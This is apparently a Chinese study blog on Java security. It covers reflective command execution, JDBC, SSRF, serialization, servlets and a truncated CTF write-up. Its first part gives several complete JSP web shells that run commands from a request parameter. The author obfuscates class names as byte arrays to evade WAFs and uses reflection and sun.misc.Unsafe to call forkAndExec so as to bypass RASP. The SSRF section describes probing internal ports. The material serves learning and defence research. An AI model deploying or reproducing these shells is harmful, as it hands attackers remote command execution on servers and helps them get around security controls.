<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="java.io.InputStream" %><%@ page import="java.lang.reflect.Method" %><%@ page import="java.util.Scanner" %><%    String str = request.getParameter("str");    // 定义"java.lang.Runtime"字符串变量    String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101});    // 反射java.lang.Runtime类获取Class对象    Class c = Class.forName(rt);    // 反射获取Runtime类的getRuntime方法    Method m1 = c.getMethod(new String(new byte[]{103, 101, 116, 82, 117, 110, 116, 105, 109, 101}));    // 反射获取Runtime类的exec方法    Method m2 = c.getMethod(new String(new byte[]{101, 120, 101, 99}), String.class);    // 反射调用Runtime.getRuntime().exec(xxx)方法    Object obj2 = m2.invoke(m1.invoke(null, new Object[]{}), new Object[]{str});    // 反射获取Process类的getInputStream方法    Method m = obj2.getClass().getMethod(new String(new byte[]{103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));    m.setAccessible(true);    // 获取命令执行结果的输入流对象：p.getInputStream()并使用Scanner按行切割成字符串    Scanner s = new Scanner((InputStream) m.invoke(obj2, new Object[]{})).useDelimiter("\\A");    String result = s.hasNext() ? s.next() : "";    // 输出命令执行结果    out.println(result);%><%- 利用byte转化为字符串的方式可以绕过一些waf -%>

命令参数是str，如：reflection-cmd.jsp?str=pwd，程序执行结果同上。

#ProcessBuilder命令执行

学习Runtime命令执行的时候我们讲到其最终exec方法会调用ProcessBuilder来执行本地命令，那么我们只需跟踪下Runtime的exec方法就可以知道如何使用ProcessBuilder来执行系统命令了。

process_builder.jsp命令执行测试：

<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="java.io.ByteArrayOutputStream" %><%@ page import="java.io.InputStream" %><%    InputStream in = new ProcessBuilder(request.getParameterValues("cmd")).start().getInputStream();    ByteArrayOutputStream baos = new ByteArrayOutputStream();    byte[] b = new byte[1024];    int a = -1;    while ((a = in.read(b)) != -1) {        baos.write(b, 0, a);    }    out.write("" + new String(baos.toByteArray()) + "
");%>

#UNIXProcess/ProcessImpl

UNIXProcess和ProcessImpl可以理解本就是一个东西，因为在JDK9的时候把UNIXProcess合并到了ProcessImpl当中了。UNIXProcess和ProcessImpl其实就是最终调用native执行系统命令的类，这个类提供了一个叫forkAndExec的native方法，如方法名所述主要是通过fork&exec来执行本地系统命令。

UNIXProcess类的forkAndExec示例：

private native int forkAndExec(int mode, byte[] helperpath,                                   byte[] prog,                                   byte[] argBlock, int argc,                                   byte[] envBlock, int envc,                                   byte[] dir,                                   int[] fds,                                   boolean redirectErrorStream)        throws IOException;

最终执行的Java_java_lang_ProcessImpl_forkAndExec：

Java_java_lang_ProcessImpl_forkAndExec完整代码:ProcessImpl_md.c

很多人对Java本地命令执行的理解不够深入导致了他们无法定位到最终的命令执行点，如果防御对象只防御到了ProcessBuilder.start()方法，而我们只需要直接调用最终执行的UNIXProcess/ProcessImpl实现命令执行或者直接反射UNIXProcess/ProcessImpl的forkAndExec方法就可以绕过RASP实现命令执行了。

#反射UNIXProcess/ProcessImpl执行本地命令

linux-cmd.jsp执行本地命令测试:

<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="java.io.*" %><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%!    // 将Java字符串转换为C风格字符串（以\0结尾的字节数组）    // 适配底层系统调用（如UNIXProcess构造参数）。    byte[] toCString(String s) {        if (s == null) {            return null;        }        byte[] bytes  = s.getBytes();        byte[] result = new byte[bytes.length + 1];        System.arraycopy(bytes, 0, result, 0, bytes.length);        result[result.length - 1] = (byte) 0;        return result;    }    InputStream start(String[] strs) throws Exception {        // 反射获取命令执行的输出的字节流                // java.lang.UNIXProcess        String unixClass = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 85, 78, 73, 88, 80, 114, 111, 99, 101, 115, 115});        // java.lang.ProcessImpl        String processClass = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 80, 114, 111, 99, 101, 115, 115, 73, 109, 112, 108});        Class clazz = null;        // 反射创建UNIXProcess或者ProcessImpl        try {            clazz = Class.forName(unixClass);        } catch (ClassNotFoundException e) {            clazz = Class.forName(processClass);        }        // 获取UNIXProcess或者ProcessImpl的构造方法        Constructor constructor = clazz.getDeclaredConstructors()[0];        constructor.setAccessible(true);                // 这里的assert和py里的是一样的作用        assert strs != null && strs.length > 0;        // 将参数转换为内存块，使得在Java中操作内存比C中更简单        byte[][] args = new byte[strs.length - 1][];        int size = args.length; // For added NUL bytes        for (int i = 0; i < args.length; i++) {            // 参数转换为字节数组            args[i] = strs[i + 1].getBytes();            size += args[i].length;        }        byte[] argBlock = new byte[size];        int    i        = 0;        for (byte[] arg : args) {            System.arraycopy(arg, 0, argBlock, i, arg.length);            i += arg.length + 1;            // No need to write NUL bytes explicitly        }        int[] envc    = new int[1];        int[] std_fds = new int[]{-1, -1, -1};        FileInputStream  f0 = null;// 命令（如/bin/sh）        FileOutputStream f1 = null;        FileOutputStream f2 = null;        // In theory, close() can throw IOException        // (although it is rather unlikely to happen here)        try {            if (f0 != null) f0.close();        } finally {            try {                if (f1 != null) f1.close();            } finally {                if (f2 != null) f2.close();            }        }        // 创建UNIXProcess或者ProcessImpl实例        Object object = constructor.newInstance(            toCString(strs[0]), // 命令（如/bin/sh）            argBlock,           // 参数块            args.length,        // 参数数量            null,               // 环境变量            envc[0],            // 环境变量数量            null,               // 工作目录            std_fds,            // 标准输入/输出/错误流            false               // 是否重定向错误流        );        // 获取命令执行的InputStream        Method inMethod = object.getClass().getDeclaredMethod("getInputStream");         inMethod.setAccessible(true);        return (InputStream) inMethod.invoke(object);// 返回输出字节流    }    String inputStreamToString(InputStream in, String charset) throws IOException {         // 将输出字节流转化为字符流        try {            if (charset == null) {                charset = "UTF-8";            }            ByteArrayOutputStream out = new ByteArrayOutputStream();            int                   a   = 0;            byte[]                b   = new byte[1024];            while ((a = in.read(b)) != -1) {                out.write(b, 0, a);            }            return new String(out.toByteArray());        } catch (IOException e) {            throw e;        } finally {            if (in != null)                in.close();        }    }%><%    String[] str = request.getParameterValues("cmd");    if (str != null) {        InputStream in     = start(str);        String      result = inputStreamToString(in, "UTF-8");        out.println("");        out.println(result);        out.println("
");        out.flush();        out.close();    }%>

forkAndExec命令执行-Unsafe+反射+Native方法调用

如果RASP把UNIXProcess/ProcessImpl类的构造方法给拦截了我们是不是就无法执行本地命令了？其实我们可以利用Java的几个特性就可以绕过RASP执行本地命令了，具体步骤如下:

使用sun.misc.Unsafe.allocateInstance(Class)特性可以无需new或者newInstance创建UNIXProcess/ProcessImpl类对象。
反射UNIXProcess/ProcessImpl类的forkAndExec方法。
构造forkAndExec需要的参数并调用。
反射UNIXProcess/ProcessImpl类的initStreams方法初始化输入输出结果流对象。
反射UNIXProcess/ProcessImpl类的getInputStream方法获取本地命令执行结果(如果要输出流、异常流反射对应方法即可)。

fork_and_exec.jsp执行本地命令示例:

<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="sun.misc.Unsafe" %><%@ page import="java.io.ByteArrayOutputStream" %><%@ page import="java.io.InputStream" %><%@ page import="java.lang.reflect.Field" %><%@ page import="java.lang.reflect.Method" %><%!    byte[] toCString(String s) {        if (s == null)            return null;        byte[] bytes  = s.getBytes();        byte[] result = new byte[bytes.length + 1];        System.arraycopy(bytes, 0,                result, 0,                bytes.length);        result[result.length - 1] = (byte) 0;        return result;    }%><%    String[] strs = request.getParameterValues("cmd");    if (strs != null) {        Field theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe");        theUnsafeField.setAccessible(true);        Unsafe unsafe = (Unsafe) theUnsafeField.get(null);        Class processClass = null;        try {            processClass = Class.forName("java.lang.UNIXProcess");        } catch (ClassNotFoundException e) {            processClass = Class.forName("java.lang.ProcessImpl");        }        Object processObject = unsafe.allocateInstance(processClass);        // Convert arguments to a contiguous block; it's easier to do        // memory management in Java than in C.        byte[][] args = new byte[strs.length - 1][];        int      size = args.length; // For added NUL bytes        for (int i = 0; i < args.length; i++) {            args[i] = strs[i + 1].getBytes();            size += args[i].length;        }        byte[] argBlock = new byte[size];        int    i        = 0;        for (byte[] arg : args) {            System.arraycopy(arg, 0, argBlock, i, arg.length);            i += arg.length + 1;            // No need to write NUL bytes explicitly        }        int[] envc                 = new int[1];        int[] std_fds              = new int[]{-1, -1, -1};        Field launchMechanismField = processClass.getDeclaredField("launchMechanism");        Field helperpathField      = processClass.getDeclaredField("helperpath");        launchMechanismField.setAccessible(true);        helperpathField.setAccessible(true);        Object launchMechanismObject = launchMechanismField.get(processObject);        byte[] helperpathObject      = (byte[]) helperpathField.get(processObject);        int ordinal = (int) launchMechanismObject.getClass().getMethod("ordinal").invoke(launchMechanismObject);        Method forkMethod = processClass.getDeclaredMethod("forkAndExec", new Class[]{                int.class, byte[].class, byte[].class, byte[].class, int.class,                byte[].class, int.class, byte[].class, int[].class, boolean.class        });        forkMethod.setAccessible(true);// 设置访问权限        int pid = (int) forkMethod.invoke(processObject, new Object[]{                ordinal + 1, helperpathObject, toCString(strs[0]), argBlock, args.length,                null, envc[0], null, std_fds, false        });        // 初始化命令执行结果，将本地命令执行的输出流转换为程序执行结果的输出流        Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class);        initStreamsMethod.setAccessible(true);        initStreamsMethod.invoke(processObject, std_fds);        // 获取本地执行结果的输入流        Method getInputStreamMethod = processClass.getMethod("getInputStream");        getInputStreamMethod.setAccessible(true);        InputStream in = (InputStream) getInputStreamMethod.invoke(processObject);        ByteArrayOutputStream baos = new ByteArrayOutputStream();        int                   a    = 0;        byte[]                b    = new byte[1024];        while ((a = in.read(b)) != -1) {            baos.write(b, 0, a);        }        out.println("");        out.println(baos.toString());        out.println("
");        out.flush();        out.close();    }%>

#JDBC 基础

JDBC(Java Database Connectivity)是Java提供对数据库进行连接、操作的标准API。Java自身并不会去实现对数据库的连接、查询、更新等操作而是通过抽象出数据库操作的API接口(JDBC)，不同的数据库提供商必须实现JDBC定义的接口从而也就实现了对数据库的一系列操作。

#JDBC Connection

Java通过java.sql.DriverManager来管理所有数据库的驱动注册，所以如果想要建立数据库连接需要先在java.sql.DriverManager中注册对应的驱动类，然后调用getConnection方法才能连接上数据库。

JDBC定义了一个叫java.sql.Driver的接口类负责实现对数据库的连接，所有的数据库驱动包都必须实现这个接口才能够完成数据库的连接操作。java.sql.DriverManager.getConnection(xx)其实就是间接的调用了java.sql.Driver类的connect方法实现数据库连接的。数据库连接成功后会返回一个叫做java.sql.Connection的数据库连接对象，一切对数据库的查询操作都将依赖于这个Connection对象。

JDBC连接数据库的一般步骤:

注册驱动，Class.forName("数据库驱动的类名")。
获取连接，DriverManager.getConnection(xxx)。

JDBC连接数据库示例代码如下:

String CLASS_NAME = "com.mysql.jdbc.Driver";String URL = "jdbc:mysql://localhost:3306/mysql"String USERNAME = "root";String PASSWORD = "root";Class.forName(CLASS_NAME);// 注册JDBC驱动类Connection connection = DriverManager.getConnection(URL, USERNAME, PASSWORD);

数据库配置信息

传统的Web应用的数据库配置信息一般都是存放在WEB-INF目录下的*.properties、*.yml、*.xml中的,如果是Spring Boot项目的话一般都会存储在jar包中的src/main/resources/目录下。

常见的存储数据库配置信息的文件路径如：WEB-INF/applicationContext.xml、WEB-INF/hibernate.cfg.xml、WEB-INF/jdbc/jdbc.properties，一般情况下使用find命令加关键字可以轻松的找出来，如查找Mysql配置信息: find 路径 -type f |xargs grep "com.mysql.jdbc.Driver"。

forName的原因

实际上这一步是利用了Java反射+类加载机制往DriverManager中注册了驱动包。

Class.forName("com.mysql.jdbc.Driver")实际上会触发类加载，com.mysql.jdbc.Driver类将会被初始化，所以static静态语句块中的代码也将会被执行，所以看似毫无必要的Class.forName其实也是暗藏玄机的。如果反射某个类又不想初始化类方法有两种途径：

使用Class.forName("xxxx", false, loader)方法，将第二个参数传入false。
ClassLoader.load("xxxx");

连接数据库就必须Class.forName(xxx)几乎已经成为了绝大部分人认为的既定事实而不可改变，但删除Class.forName一样可以连接数据库。实际上这里又利用了Java的一大特性:Java SPI(Service Provider Interface)，因为DriverManager在初始化的时候会调用java.util.ServiceLoader类提供的SPI机制，Java会自动扫描jar包中的META-INF/services目录下的文件，并且还会自动的Class.forName(文件中定义的类)，这也就解释了为什么不需要Class.forName也能够成功连接数据库的原因了。

#DataSource

在真实的Java项目中通常不会使用原生的JDBC的DriverManager去连接数据库，而是使用数据源(javax.sql.DataSource)来代替DriverManager管理数据库的连接。一般情况下在Web服务启动时候会预先定义好数据源，有了数据源程序就不再需要编写任何数据库连接相关的代码了，直接引用DataSource对象即可获取数据库连接了。

常见的数据源有：DBCP、C3P0、Druid、Mybatis DataSource，他们都实现于javax.sql.DataSource接口。

等之后学完Java web后补充

#URLConnection

Java抽象出了一个URLConnection类，它用来表示应用程序以及与URL建立通信连接的所有类的超类，通过URL类中的openConnection方法获取到URLConnection的类对象。

Java中URLConnection支持的协议可以在sun.net.www.protocol看到。

每个协议都有一个Handle,Handle定义了这个协议如何去打开一个连接。

我们来使用URL发起一个简单的请求

public class URLConnectionDemo {    public static void main(String[] args) throws IOException {        URL url = new URL("https://www.baidu.com");        // 打开和url之间的连接        URLConnection connection = url.openConnection();        // 设置请求参数        connection.setRequestProperty("user-agent", "javasec");        connection.setConnectTimeout(1000);        connection.setReadTimeout(1000);        // ...        // 建立实际连接        connection.connect();        // 获取响应头字段信息列表        connection.getHeaderFields();        // 获取URL响应        connection.getInputStream();        StringBuilder response = new StringBuilder();        BufferedReader in = new BufferedReader(                new InputStreamReader(connection.getInputStream()));        String line;        while ((line = in.readLine()) != null) {            response.append("/n").append(line);        }        System.out.print(response.toString());    }}

首先使用URL建立一个对象，调用url对象中的openConnection来获取一个URLConnection的实例，然后通过在URLConnection设置各种请求参数以及一些配置，在使用其中的connect方法来发起请求，然后在调用getInputStream来获请求的响应流。这是一个基本的请求到响应的过程。

#SSRF相关

ssrf漏洞也对使用不同类发起的url请求也是有所区别的，如果是URLConnection|URL发起的请求，那么对于上文中所提到的所有protocol都支持，但是如果经过二次包装或者其他的一些类发出的请求，比如

HttpURLConnectionHttpClientRequestokhttp……

那么只支持发起http|https协议，否则会抛出异常。

如果传入的是http://192.168.xx.xx:80，且192.168.xx.xx的80端口存在的，则会将其网页源码输出出来。但如果是非web端口的服务，则会爆出Invalid Http response 或Connection reset异常。如果能将此异常抛出来，那么就可以对内网所有服务端口进行探测。

java中默认对(http|https)做了一些事情，比如:

默认启用了透明NTLM认证
默认跟随跳转

NTLM是NT LAN Manager的简称，NT(New Technology)是Windows发布的桌面操作系统简称。NTLM协议提供身份认证功能，也支持提供会话安全（传递消息的签名以及加密）。
NTLM协议的身份认证机制是challenge-response，由Server发送challenge（8字节随机数），Client根据自己密钥、Server的challenge以及其他一些信息，计算出response，发送至Server，Server则根据相同算法计算，比较response是否一致来决定认证是否通过。

#Java 序列化和反序列化

在很多语言中都提供了对象反序列化支持，Java在JDK1.1(1997年)时就内置了对象反序列化(java.io.ObjectInputStream)支持。Java对象序列化指的是将一个Java类实例序列化成字节数组，用于存储对象实例化信息：类成员变量和属性值。 Java反序列化可以将序列化后的二进制数组转换为对应的Java类实例。

Java序列化对象因其可以方便的将对象转换成字节数组，又可以方便快速的将字节数组反序列化成Java对象而被非常频繁的被用于Socket传输。在RMI(Java远程方法调用-Java Remote Method Invocation)和JMX(Java管理扩展-Java Management Extensions)服务中对象反序列化机制被强制性使用。在Http请求中也时常会被用到反序列化机制，如：直接接收序列化请求的后端服务、使用Base编码序列化字节字符串的方式传递等。

自从2015年Apache Commons Collections反序列化漏洞(ysoserial的最早的commit记录是2015年1月29日,说明这个漏洞可能早在2014年甚至更早就已经被人所利用)利用方式被人公开后直接引发了Java生态系统的大地震，与此同时Java反序列化漏洞仿佛掀起了燎原之势，无数的使用了反序列化机制的Java应用系统惨遭黑客疯狂的攻击，为企业安全甚至是国家安全带来了沉重的打击。

#Java 序列化/反序列化

在Java中实现对象反序列化非常简单，实现java.io.Serializable(内部序列化)或java.io.Externalizable(外部序列化)接口即可被序列化，其中java.io.Externalizable接口只是实现了java.io.Serializable接口。反序列化类对象时有如下限制：

被反序列化的类必须存在。
serialVersionUID值必须一致。

除此之外，反序列化类对象是不会调用该类构造方法的，因为在反序列化创建类实例时使用了sun.reflect.ReflectionFactory.newConstructorForSerialization创建了一个反序列化专用的Constructor(反射构造方法对象)，使用这个特殊的Constructor可以绕过构造方法创建类实例。

使用反序列化方式创建类实例代码片段：

package Test;import sun.reflect.ReflectionFactory;import java.lang.reflect.Constructor;public class Main {    public static void main(String[] args) {        try {            // 获取sun.reflect.ReflectionFactory对象            ReflectionFactory factory = ReflectionFactory.getReflectionFactory();            // 使用反序列化方式获取DeserializationTest类的构造方法            @SuppressWarnings("rawtypes")            Constructor constructor = factory.newConstructorForSerialization(                    DeserializationTest.class, Object.class.getConstructor()            );            // 实例化DeserializationTest对象            System.out.println(constructor.newInstance());        } catch (Exception e) {            e.printStackTrace();        }    }}class DeserializationTest{    // ......}// 输出：Test.DeserializationTest@23fc625e

#ObjectInputStream、ObjectOutputStream

java.io.ObjectOutputStream类最核心的方法是writeObject方法，即序列化类对象。

java.io.ObjectInputStream类最核心的功能是readObject方法，即反序列化类对象。

所以，只需借助ObjectInputStream和ObjectOutputStream类我们就可以实现类的序列化和反序列化功能了(毕竟序列化和反序列化就是一个读字符串在根据它写出相应对象或者这一反过程)。

#java.io.Serializable

java.io.Serializable是一个空的接口,我们不需要实现java.io.Serializable的任何方法，代码如下:

public interface Serializable {}

实现一个空接口有什么意义？其实实现java.io.Serializable接口仅仅只用于标识这个类可序列化。实现了java.io.Serializable接口的类原则上都需要生产一个serialVersionUID常量，反序列化时如果双方的serialVersionUID不一致会导致InvalidClassException 异常。如果可序列化类未显式声明 serialVersionUID，则序列化运行时将基于该类的各个方面计算该类的默认 serialVersionUID值。

DeserializationTest.java测试代码如下：

package com.anbai.sec.serializes;import java.io.*;import java.util.Arrays;/** * Creator: yz * Date: 2019/12/15 */public class DeserializationTest implements Serializable {    private String username;    private String email;    // 省去get/set方法....    public static void main(String[] args) {        ByteArrayOutputStream baos = new ByteArrayOutputStream();        try {            // 创建DeserializationTest类，并类设置属性值            DeserializationTest t = new DeserializationTest();            t.setUsername("yz");            t.setEmail("admin@javaweb.org");            // 创建Java对象序列化输出流对象            ObjectOutputStream out = new ObjectOutputStream(baos);            // 序列化DeserializationTest类            out.writeObject(t);            out.flush();            out.close();            // 打印DeserializationTest类序列化以后的字节数组，我们可以将其存储到文件中或者通过Socket发送到远程服务地址            System.out.println("DeserializationTest类序列化后的字节数组:" + Arrays.toString(baos.toByteArray()));            // 利用DeserializationTest类生成的二进制数组创建二进制输入流对象用于反序列化操作            ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());            // 通过反序列化输入流(bais),创建Java对象输入流(ObjectInputStream)对象            ObjectInputStream in = new ObjectInputStream(bais);            // 反序列化输入流数据为DeserializationTest对象            DeserializationTest test = (DeserializationTest) in.readObject();            System.out.println("用户名:" + test.getUsername() + ",邮箱:" + test.getEmail());            // 关闭ObjectInputStream输入流            in.close();        } catch (IOException e) {            e.printStackTrace();        } catch (ClassNotFoundException e) {            e.printStackTrace();        }    }}

程序执行结果如下：

DeserializationTest类序列化后的字节数组:[-84, -19, 0, 5, 115, 114, 0, 44, 99, 111, 109, 46, 97, 110, 98, 97, 105, 46, 115, 101, 99, 46, 115, 101, 114, 105, 97, 108, 105, 122, 101, 115, 46, 68, 101, 115, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 84, 101, 115, 116, 74, 36, 49, 16, -110, 39, 13, 76, 2, 0, 2, 76, 0, 5, 101, 109, 97, 105, 108, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 76, 0, 8, 117, 115, 101, 114, 110, 97, 109, 101, 113, 0, 126, 0, 1, 120, 112, 116, 0, 17, 97, 100, 109, 105, 110, 64, 106, 97, 118, 97, 119, 101, 98, 46, 111, 114, 103, 116, 0, 2, 121, 122]用户名:yz,邮箱:admin@javaweb.org

核心逻辑其实就是使用ObjectOutputStream类的writeObject方法序列化DeserializationTest类，使用ObjectInputStream类的readObject方法反序列化DeserializationTest类而已。

上面这么一大段代码可以简化成如下：

// 序列化DeserializationTest类ObjectOutputStream out = new ObjectOutputStream(baos);out.writeObject(t);// 反序列化输入流数据为DeserializationTest对象ObjectInputStream in = new ObjectInputStream(bais);DeserializationTest test = (DeserializationTest) in.readObject();

ObjectOutputStream序列化类对象的主要流程是首先判断序列化的类是否重写了writeObject方法，如果重写了就调用序列化对象自身的writeObject方法序列化，序列化时会先写入类名信息，其次是写入成员变量信息(通过反射获取所有不包含被transient修饰的变量和值)。

#java.io.Externalizable

java.io.Externalizable和java.io.Serializable几乎一样，只是java.io.Externalizable接口定义了writeExternal和readExternal方法需要序列化和反序列化的类实现，其余的和java.io.Serializable并无差别。

java.io.Externalizable.java:

public interface Externalizable extends java.io.Serializable {  void writeExternal(ObjectOutput out) throws IOException;  void readExternal(ObjectInput in) throws IOException, ClassNotFoundException;}

ExternalizableTest.java测试代码如下：

package com.anbai.sec.serializes;import java.io.*;import java.util.Arrays;public class ExternalizableTest implements java.io.Externalizable {    private String username;    private String email;    // 省去get/set方法....    @Override    public void writeExternal(ObjectOutput out) throws IOException {        out.writeObject(username);        out.writeObject(email);    }    @Override    public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {        this.username = (String) in.readObject();        this.email = (String) in.readObject();    }    public static void main(String[] args) {        // 省去测试代码，因为和DeserializationTest一样...    }}

程序执行结果如下：

ExternalizableTest类序列化后的字节数组:[-84, -19, 0, 5, 115, 114, 0, 43, 99, 111, 109, 46, 97, 110, 98, 97, 105, 46, 115, 101, 99, 46, 115, 101, 114, 105, 97, 108, 105, 122, 101, 115, 46, 69, 120, 116, 101, 114, 110, 97, 108, 105, 122, 97, 98, 108, 101, 84, 101, 115, 116, -122, 124, 92, -120, -52, 73, -100, 6, 12, 0, 0, 120, 112, 116, 0, 2, 121, 122, 116, 0, 17, 97, 100, 109, 105, 110, 64, 106, 97, 118, 97, 119, 101, 98, 46, 111, 114, 103, 120]ExternalizableTest类反序列化后的字符串:��sr+com.anbai.sec.serializes.ExternalizableTest�|\��I�xptyztadmin@javaweb.orgx用户名:yz,邮箱:admin@javaweb.org

鉴于两者之间没有多大差别，这里就不再赘述。

#Java Web

#Java EE

Java EE指的是Java平台企业版（Java Platform Enterprise Edition），之前称为Java 2 Platform, Enterprise Edition(J2EE)，2017 年的 9 月Oracle将Java EE 捐赠给 Eclipse 基金会，由于Oracle持有Java商标原因，Eclipse基金于2018年3月将Java EE更名为Jakarta EE。

#Servlet

Servlet是在 Java Web容器中运行的小程序,通常我们用Servlet来处理一些较为复杂的服务器端的业务逻辑。Servlet是Java EE的核心,也是所有的MVC框架的实现的根本。

#Servlet的定义

定义一个 Servlet 很简单，只需要继承javax.servlet.http.HttpServlet类并重写doXXX(如doGet、doPost)方法或者service方法就可以了，其中需要注意的是重写HttpServlet类的service方法可以获取到上述七种Http请求方法的请求。

javax.servlet.http.HttpServlet：

在写Servlet之前我们先了解下HttpServlet,javax.servlet.http.HttpServlet类继承于javax.servlet.GenericServlet，而GenericServlet又实现了javax.servlet.Servlet和javax.servlet.ServletConfig。javax.servlet.Servlet接口中只定义了servlet基础生命周期方法：init(初始化)、getServletConfig(配置)、service(服务)、destroy(销毁),而HttpServlet不仅实现了servlet的生命周期并通过封装service方法抽象出了doGet/doPost/doDelete/doHead/doPut/doOptions/doTrace方法用于处理来自客户端的不一样的请求方式，我们的Servlet只需要重写其中的请求方法或者重写service方法即可实现servlet请求处理。

TestServlet示例代码:

package com.anbai.sec.servlet;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.io.PrintWriter;// 如果使用注解方式请取消@WebServlet注释并注释掉web.xml中TestServlet相关配置//@WebServlet(name = "TestServlet", urlPatterns = {"/TestServlet"})public class TestServlet extends HttpServlet {    @Override    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {        doPost(request, response);    }    @Override    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException {        PrintWriter out = response.getWriter();        out.println("Hello World~");        out.flush();        out.close();    }}

#Servlet Web.xml配置

注意！现在很少还会用xml编写配置，大多都已经使用了注解的方式。不过注解和xml还是有互通，所以还是学一学。

Servlet3.0 之前的版本都需要在web.xml 中配置servlet标签，servlet标签是由servlet和servlet-mapping标签组成的,两者之间通过在servlet和servlet-mapping标签中同样的servlet-name名称来实现关联的。

以下来自 web.xml 的配置。部分解释来自于deepseek。

下面是一个典型的 web.xml 文件的基本结构：

                 My Web Application    My first web application                MyServlet        com.example.MyServlet                    MyServlet        /myservlet                    MyFilter        com.example.MyFilter                    MyFilter        /*                    com.example.MyListener                    index.html        index.jsp                    404        /error/404.jsp                    contextConfigLocation        /WEB-INF/spring-context.xml                    30                                 Protected Area            /protected/*                            admin

这是整个配置文件的根标签，web.xml的模式文件是由Sun公司定义的，它必须标明web.xml使用的是哪个模式文件。并且声明这是一个 Servlet 3.0 规范的部署描述符(version="3.0")。

它标注了该web项目的名字，提供GUI工具可能会用来标记这个特定的Web应用的一个名称。

应用的详细描述。

定义了首页文件，也就是用户直接输入域名时跳转的页面。

用来声明一个servlet的数据，主要有以下子元素：

:指定servlet的名称
:指定servlet的类名称
:指定web站台中的某个JSP网页的完整路径

:用来定义初始化参数，可有多个init-param。

在servlet类中通过ServletConfig对象传入init函数，通过getInitParamenter(String name)方法访问初始化参数。
例如使用来初始化数据库连接参数:

public void init(ServletConfig config) throws SevletException{    super(config);    String driver = config.getInitParameter("driver");    String url = config.getInitParameter("url");    String username = config.getInitParameter("username");    String passwd = config.getInitParameter("passwd");    try{        Class.forName(driver).newInstance();        this.conn = DriverManager.getConnection(url, username, passwd);        System.out.println("Connection successful...");    } catch(SQLExceprion se){        System.out.println("se");    } catch(Exception e){        e.printStackTrace():    }    }

此时servlet配置为:

    myServlet    *.myservlet            driver        com.mysql.jdbc.Driver                url        jdbc:mysql://localhost:3306/myDatabase                username        tang                passwd        whu

:指定当Web应用启动时，装载Servlet的次序。
当值为正数或零时：Servlet容器先加载数值小的servlet，再依次加载其他数值大的servlet。
当值为负或未定义：Servlet容器将在Web客户首次访问这个servlet时加载它。
:用来定义servlet所对应的URL，包含两个子元素。
- :指定servlet的名称
- :指定servlet所对应的URL
:配置过滤器，包含两个子元素。
- :指定过滤器名称。
- ****：指定实现过滤器的类。
:映射过滤器，包含两个子元素。
- :指定应用的过滤器。
- :拦截的url模式。

filter应用例：

    MyFilter    com.example.MyFilter                encoding        UTF-8        MyFilter        /*        REQUEST    FORWARD

public class MyFilter implements Filter {    private String encoding;        @Override    public void init(FilterConfig config) throws ServletException {        // 读取初始化参数()        this.encoding = config.getInitParameter("encoding");        System.out.println("Filter初始化，编码设置为：" + encoding);    }    @Override    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)            throws IOException, ServletException {        // 1. 预处理请求        request.setCharacterEncoding(encoding);        response.setCharacterEncoding(encoding);        // 2. 执行后续操作（如调用下一个过滤器或Servlet）        chain.doFilter(request, response);        // 3. 后处理响应        System.out.println("请求处理完成，响应已返回");    }    @Override    public void destroy() {        // 清理资源        System.out.println("Filter销毁");    }}

:配置错误页面，有如下常用子元素
- :设定发生何错误时触发(根据错误码)
- :设定重定向到何页面
****：设定侦听器
- :指定实现了侦听器的类。
:定义所谓上下文配置，可以理解为全局参数。用法和基本已知，但定义的参数只能使用在servlet类的init()方法中调用。
:用于设定session相关配置。
:用于设定安全相关的配置。

#Servlet 3.0+ 基于注解方式配置

在 Servlet 3.0 之后( Tomcat7+)可以使用注解方式配置 Servlet 了,在任意的Java类添加javax.servlet.annotation.WebServlet注解即可。

基于注解的方式配置Servlet实质上是对基于web.xml方式配置的简化，极大的简化了Servlet的配置方式，但是也提升了对Servlet配置管理的难度，因为我们不得不去查找所有包含了@WebServlet注解的类来寻找Servlet的定义，而不再只是查看web.xml中的servlet标签配置。

现在大多是通过注解来配置，xml形式太过冗杂。

从SignIn_Java 学jar调试

2025-03-10T05:46:00.000Z

#碎碎念

当时做这题本身每抱太大希望，但稍微看了一下代码，确实能看出来就是任意Bean的方法调用，或者可能是fastjson的洞(这里只用到一点特性)。但是问题很多，那就是手头只有jar包，怎么知道有哪些已有的bean呢?为什么传入规定格式的请求，会报``呢?事后问了学长才知道是得调试的然而我完全不会调试，搜也搜不到一个靠谱的，最后还是学长指导才整会，这里先感谢Liki4学长和柏师傅的耐心指导喵。

#题面

题目给了jar包，结构长这样：

下面贴几段比较关键的源码:

// SpringContextHolder.javapackage icu.Liki4.signin.util;import java.util.Map;import org.slf4j.Logger;import org.slf4j.LoggerFactory;import org.springframework.beans.BeansException;import org.springframework.beans.factory.DisposableBean;import org.springframework.beans.factory.NoSuchBeanDefinitionException;import org.springframework.context.ApplicationContext;import org.springframework.context.ApplicationContextAware;import org.springframework.stereotype.Component;@Componentpublic class SpringContextHolder implements ApplicationContextAware, DisposableBean {    private static final Logger logger = LoggerFactory.getLogger((Class) SpringContextHolder.class);    private static ApplicationContext applicationContext = null;    @Override // org.springframework.beans.factory.DisposableBean    public void destroy() throws Exception {        clear();    }    @Override // org.springframework.context.ApplicationContextAware    public void setApplicationContext(ApplicationContext applicationContext2) throws BeansException {        applicationContext = applicationContext2;    }    public static ApplicationContext getApplicationContext() {        assertContextInjected();        return applicationContext;    }    public static ApplicationContext 